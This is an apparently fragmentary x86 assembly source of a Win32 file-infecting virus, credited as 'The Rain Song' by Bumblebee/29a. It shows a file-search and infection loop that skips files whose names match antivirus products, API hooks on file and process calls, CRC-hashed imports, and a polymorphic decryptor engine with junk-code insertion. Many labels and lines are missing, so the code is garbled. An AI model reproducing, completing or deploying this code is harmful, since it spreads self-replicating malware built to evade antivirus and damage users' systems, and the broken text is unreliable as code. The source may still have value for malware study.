        mov     eax,dword ptr [find_data.nFileSizeLow+ebp]
        cmp     eax,4000h
        jb      skipThisFile                    ; at least 4000h bytes?
        mov     ecx,PADDING                     ; test if it's infected
        xor     edx,edx                         ; yet
        div     ecx
        or      edx,edx                         ; reminder is zero?
        jz      skipThisFile

testIfAv:                                       ; let's search for strings
                                                ; that may appear in av progs
        lea     edi,avStrings+ebp
        mov     ecx,vStringsCout
        push    esi
        mov     ax,word ptr [edi]
        cmp     word ptr [esi],ax
        jne     contTestLoop
        pop     esi
        jmp     skipThisFile
        inc     esi
        cmp     byte ptr [esi+3],0              ; skip the ext
        jne     testAvLoop
        pop     esi
        add     edi,2
        loop    testIfAvL

        call    infect

        lea     esi,find_data+ebp
        push    esi
        push    dword ptr [findHnd+ebp]
        call    dword ptr [_FindNextFileA+ebp]  ; Find next file
        or      eax,eax
        jnz     findNext

        push    dword ptr [findHnd+ebp]
        call    dword ptr [_FindClose+ebp]


; Virus data ---------------------------------------------------------------
HOOKTABLEBEGIN  label   byte
                dd      offset _CreateFileA
                dd      offset Hook0
                dd      offset _MoveFileA
                dd      offset Hook1
                dd      offset _CopyFileA
                dd      offset Hook2
                dd      offset _CreateProcessA
                dd      offset Hook3
                dd      offset _SetFileAttributesA
                dd      offset Hook4
                dd      offset _GetFileAttributesA
                dd      offset Hook5
                dd      offset _SearchPathA
                dd      offset Hook6
HOOKTABLEEND    label   byte
EPOAddr         dd      0

copyright       db      '< The Rain Song Coded By Bumblebee/29a >',0dh,0ah

                        ; little tribute
message         db      'ASIMOV Jan.2.1920 - Apr.6.1992',0

FSTAPI                  label   byte
CrcCreateFileA          dd      08c892ddfh
                        db      12
_CreateFileA            dd      0

CrcMapViewOfFile        dd      0797b49ech
                        db      14
_MapViewOfFile          dd      0

CrcCreatFileMappingA    dd      096b2d96ch
                        db      19
_CreateFileMappingA     dd      0

CrcUnmapViewOfFile      dd      094524b42h
                        db      16
_UnmapViewOfFile        dd      0

CrcCloseHandle          dd      068624a9dh
                        db      12
_CloseHandle            dd      0

CrcFindFirstFileA       dd      0ae17ebefh
                        db      15
_FindFirstFileA         dd      0

CrcFindNextFileA        dd      0aa700106h
                        db      14
_FindNextFileA          dd      0

CrcFindClose            dd      0c200be21h
                        db      10
_FindClose              dd      0

CrcVirtualAlloc         dd      04402890eh
                        db      13
_VirtualAlloc           dd      0

CrcGetTickCount         dd      0613fd7bah
                        db      13
_GetTickCount           dd      0

CrcGetFileTime          dd      04434e8feh
                        db      12
_GetFileTime            dd      0

CrcSetFileTime          dd      04b2a3e7dh
                        db      12
_SetFileTime            dd      0

CrcSetFileAttributesA   dd      03c19e536h
                        db      19
_SetFileAttributesA     dd      0

CrcGetFileAttributesA   dd      0c633d3deh
                        db      19
_GetFileAttributesA     dd      0

CrcGetFileSize          dd      0ef7d811bh
                        db      12
_GetFileSize            dd      0

CrcGetSystemTime        dd      075b7ebe8h
                        db      14
_GetSystemTime          dd      0

CrcFatalAppExitA        dd      0253ab1b9h
                        db      14
_FatalAppExitA          dd      0

CrcMoveFileA            dd      02308923fh
                        db      10
_MoveFileA              dd      0

CrcCopyFileA            dd      05bd05db1h
                        db      10
_CopyFileA              dd      0

CrcCreateProcessA       dd      0267e0b05h
                        db      15
_CreateProcessA         dd      0

CrcSearchPathA          dd      0f4d9d033h
                        db      12
_SearchPathA            dd      0

CrcGetCurrentDirectoryA dd      0ebc6c18bh
                        db      21
_GetCurrentDirectoryA   dd      0

CrcSetCurrentDirectoryA dd      0b2dbd7dch
                        db      21 
_SetCurrentDirectoryA   dd      0

CrcGetWindowsDirectoryA dd      0fe248274h
                        db      21 
_GetWindowsDirectoryA   dd      0
ENDAPI                  label   byte

; AV: AVP, PAV, NAV, ...
; TB: THUNDERBYTE... (this still exists?)
; F-: F-PROT, ...
avStrings       dw      'VA','NA','RD','DI','DO','BT','-F'
vStringsCout    equ     (offset $-offset avStrings)/2
fndMask                 db      '*.*',0
; Virus data ends here -----------------------------------------------------

;  Polymorphic Engine (V2LPE - Very^2 Lame Polymorphic Engine)
;  This is a simple polymorphic engine. Uses some piezes of code from
;  AOCPE. Very, very lame :( But does its work as poly engine. May be
;  its size the only one point for.
;  EAX: CrptKey
;  ECX: CodeSize (code to decrypt prepared yet)
;  EDI: Destination address
; returns EAX: size of generated proc
        pushad                                  ; setup regs status
        xor     eax,eax
        lea     edi,RegStatus+ebp
        mov     ecx,8
        rep     stosb
        mov     byte ptr [RegStatus+ebp+_EBP],1
        mov     byte ptr [RegStatus+ebp+_ESP],1
        mov     dword ptr [CrptKey+ebp],eax
        mov     dword ptr [CodeSize+ebp],ecx

        push    edi

        xor     eax,eax
        call    GetReg
        mov     byte ptr [KeyReg+ebp],al

        call    AddShit

        mov     cl,_EBP
        call    AddPushREG

        call    AddShit

        mov     ax,0ec8bh

        call    AddShit

        mov     edx,04h
        mov     cl,_EBP
        call    AddMovREGMEMEBP

        call    AddShit

        mov     cl,byte ptr [KeyReg+ebp]
        call    AddPushREG

        call    AddShit

        mov     cl,byte ptr [KeyReg+ebp]
        mov     edx,dword ptr [CrptKey+ebp]
        call    AddMovREGINM

        call    AddShit

        call    GetReg
        mov     byte ptr [LoopReg+ebp],al

        mov     cl,al
        call    AddPushREG

        call    AddShit

        mov     cl,byte ptr [LoopReg+ebp]
        mov     edx,dword ptr [CodeSize+ebp]
        call    AddMovREGINM

        call    AddShit

        push    edi

        mov     cl,byte ptr [KeyReg+ebp]
        call    AddXorMEMEBPREG

        call    AddShit

        mov     cl,_EBP
        mov     edx,04h
        call    AddAddREGINM

        call    AddShit

        mov     cl,byte ptr [LoopReg+ebp]
        mov     edx,1
        call    AddSubREGINM

        pop     ebx
        mov     eax,edi
        sub     eax,ebx
        push    eax
        mov     al,75h
        pop     eax
        mov     ah,0feh
        xchg    al,ah
        sub     al,ah

        call    AddShit

        mov     cl,byte ptr [LoopReg+ebp]
        call    AddPopREG

        call    AddShit

        mov     al,byte ptr [LoopReg+ebp]
        call    FreeReg

        mov     cl,byte ptr [KeyReg+ebp]
        call    AddPopREG

        call    AddShit

        mov     cl,_EBP
        call    AddPopREG

        call    AddShit

        mov     al,0c3h

        pop     esi
        sub     edi,esi
        mov     eax,edi

; Poly engine data
_EAX    equ     0
_ECX    equ     1
_EDX    equ     2
_EBX    equ     3
_ESP    equ     4
_EBP    equ     5
_ESI    equ     6
_EDI    equ     7
RegStatus       db      8 dup(0)
KeyReg          db      0
LoopReg         db      0
CrptKey         dd      0
CodeSize        dd      0
Rnd             db      ?

; returns AL: selected register
        xor     eax,eax
        mov     al,byte ptr [CrptKey+ebp]
        and     al,7
        lea     ecx,RegStatus+ebp
        add     ecx,eax
        mov     dl,byte ptr [ecx]
        or      dl,dl
        jz      GetReg0
        inc     al
        jmp     GetReg1
        mov     byte ptr [ecx],1

;  AL: selected register to free
        and     eax,7
        lea     ecx,RegStatus+ebp
        add     ecx,eax
        mov     byte ptr [ecx],0

;  Instruction generators
;  EDI: Destination code
;  ECX: Reg (if applicable)
;  EDX: Inm (if applicable)

        mov     al,050h
        add     al,cl

        mov     al,058h
        add     al,cl
        mov     al,0b8h
        add     al,cl
        mov     eax,edx

        mov     al,08bh
        mov     al,08h
        mul     cl
        add     al,85h
        mov     eax,edx

        mov     al,031h
        mov     al,08h
        mul     cl
        add     al,45h
        xor     al,al

        or      cl,cl
        jnz     AddAddREGINM0
        mov     al,05h
        jmp     AddAddREGINM1
        mov     al,081h
        mov     al,0c0h
        add     al,cl
        mov     eax,edx

        or      cl,cl
        jnz     AddSubREGINM0
        mov     al,2dh
        jmp     AddSubREGINM1
        mov     al,081h
        mov     al,0e8h
        add     al,cl
        mov     eax,edx
; Yet another lame shit generator by Bumblebee ;)
        mov     eax,dword ptr [CrptKey+ebp]
        add     byte ptr [Rnd+ebp],al
        and     al,1
        jz      AddShit2

        xor     eax,eax
        mov     al,byte ptr [Rnd+ebp]
        lea     edx,shit0+ebp
        and     al,7
        mov     cl,2
        mul     cl
        add     edx,eax
        mov     ax,word ptr [edx]

        mov     al,byte ptr [Rnd+ebp]
        and     al,2
        jz      AddShit2

        lea     edx,shit1+ebp
        mov     al,byte ptr [Rnd+ebp]
        and     al,3
        mov     cl,2
        mul     cl
        add     edx,eax
        mov     ax,word ptr [edx]

        xor     eax,eax
        mov     al,byte ptr [Rnd+ebp]
        lea     edx,shit0+ebp
        and     al,7
        mov     cl,2
        mul     cl
        add     edx,eax
        mov     ax,word ptr [edx]

        lea     edx,shit0+ebp
        add     edx,2
        mov     al,byte ptr [Rnd+ebp]
        and     al,3
        mov     cl,2
        mul     cl
        add     edx,eax
        mov     ax,word ptr [edx]

; some do-nothing opcodes
shit0:  dw      9090h,0db87h,0c987h,0d287h,4840h,434bh,4941h,4a42h
shit1:  dw      0d0f7h,0d3f7h,0d1f7h,0d2f7h

crptSecondEND label byte
; Decryptor for the second layer.
        push    ebp
        mov     ebp,esp
        push    ecx
        mov     ebp,dword ptr [ebp+4]
        mov     ecx,crptSecondEND-crptSecondINI
        not     byte ptr [ebp]
        inc     ebp
        loop    secondLayerLoop
        pop     ecx ebp

crptEND label byte
vEnd    label byte

; This is a fake decryptor for the 1st generation. Allows the virus to
; skip the second layer decryptor.
        pop     edx
        lea     edx,crptSecondINI
        push    edx
; Temp data. Not stored into the file, only 1st generation.
BUFFERBEGIN     label   byte
stringBuffer    db      STRINGTOP dup(0)
tmpPath         db      STRINGTOP dup(0)
address         dd      0
names           dd      0 
ordinals        dd      0
nexports        dd      0
expcount        dd      0
memHnd          dd      0

fHnd            dd      0
fhmap           dd      0
mapMem          dd      0

fileSize        dd      0
fileAttrib      dd      0
fileTime0       dd      0,0
fileTime1       dd      0,0
fileTime2       dd      0,0
pad             dd      0
fNameAddr       dd      0
gensize         dd      0
virtsize        dd      0
myRVA           dd      0
fstSec          dd      0
find_data       WIN32_FIND_DATA <0>
findHnd         dd      0
semHook         db      0
EPORva          dd      0
BUFFEREND       label   byte

; For 1st generation only.
        push    0h
        call    ExitProcess
End     inicio